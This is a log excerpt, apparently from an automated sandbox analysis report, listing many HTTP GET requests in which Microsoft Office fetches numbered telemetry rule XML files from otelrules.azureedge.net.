Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
